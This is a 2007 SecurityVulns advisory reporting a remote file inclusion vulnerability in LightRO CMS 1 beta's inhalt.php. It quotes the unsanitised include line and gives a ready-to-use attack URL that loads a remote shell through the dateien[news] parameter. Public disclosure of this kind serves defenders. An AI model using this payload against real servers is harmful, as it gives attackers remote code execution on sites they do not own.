LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability

2007-02-07T00:00:00
ID SECURITYVULNS:DOC:15988
Type securityvulns
Reporter Securityvulns
Modified 2007-02-07T00:00:00

Description


Title : LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability

Author : ajann

Contact : :(

S.Page : http://www.lightro.de.tc/

$$ : Free


[[ERROR]]] .. ... ..... <? include $dateien['news']; ?> .. ... .....

[[ERROR]]]

[[RFI]]]

http://[target]/[path]/inhalt.php?dateien[news]=[SHELL]

Example:

//inhalt.php?dateien[news]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""

ajann,Turkey

...

Im not Hacker!